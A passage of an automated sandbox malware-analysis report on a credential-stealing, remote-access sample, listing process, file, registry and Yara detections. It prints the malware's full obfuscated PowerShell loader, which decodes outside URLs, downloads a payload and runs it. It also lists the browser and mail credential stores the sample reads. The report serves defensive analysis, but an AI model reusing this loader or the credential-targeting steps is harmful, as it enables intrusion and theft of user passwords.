sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9Jump to behavior
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4552464938.00000000007E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager(
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4552464938.00000000007E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager#
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2139093397.0000000000793000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4552464938.00000000007E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4552464938.00000000007E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerK
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4552464938.00000000007E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2169478145.00000000007E2000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2169646839.00000000007E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerX@
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4549696326.000000000072E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerai
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4549696326.000000000072E000.00000004.00000020.00020000.00000000.sdmp, sfvnspt.dat.0.drBinary or memory string: [2024/07/26 09:46:57 Program Manager]
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4552464938.00000000007E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerz"
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4552464938.00000000007E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerS"
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4552464938.00000000007E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4552464938.00000000007E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00434C52 cpuid 0_2_00434C52
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: GetLocaleInfoA,0_2_0040F8D1
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_00452036
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_004520C3
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: GetLocaleInfoW,0_2_00452313
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_00448404
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0045243C
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: GetLocaleInfoW,0_2_00452543
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00452610
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: GetLocaleInfoW,0_2_004488ED
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00451CD8
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_00451F50
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_00451F9B
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00404F51 GetLocalTime,CreateEventA,CreateThread,0_2_00404F51
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0041B60D GetComputerNameExW,GetUserNameW,0_2_0041B60D
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00449190
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0041739B GetVersionExW,4_2_0041739B
                      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4549696326.000000000072E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.2171694344.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2170895717.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.2172358054.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 4368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3744, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3792, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3504, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_0040BA12
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\0_2_0040BB30
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: \key3.db0_2_0040BB30
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: ESMTPPassword5_2_004033F0
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword5_2_00402DB3
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword5_2_00402DB3
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 4368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3744, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4549696326.000000000072E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.2171694344.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2170895717.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.2172358054.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 4368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3744, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3792, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3504, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: cmd.exe0_2_0040569A
